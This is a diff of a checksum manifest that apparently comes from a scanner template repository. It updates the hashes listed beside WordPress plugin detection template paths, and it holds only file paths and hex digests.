 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
-http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
